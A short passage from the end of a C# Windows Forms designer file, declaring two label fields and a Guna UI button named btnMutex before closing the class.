		private global::System.Windows.Forms.Label label17;

		private global::System.Windows.Forms.Label label5;
        private Guna.UI2.WinForms.Guna2Button btnMutex;
    }
}
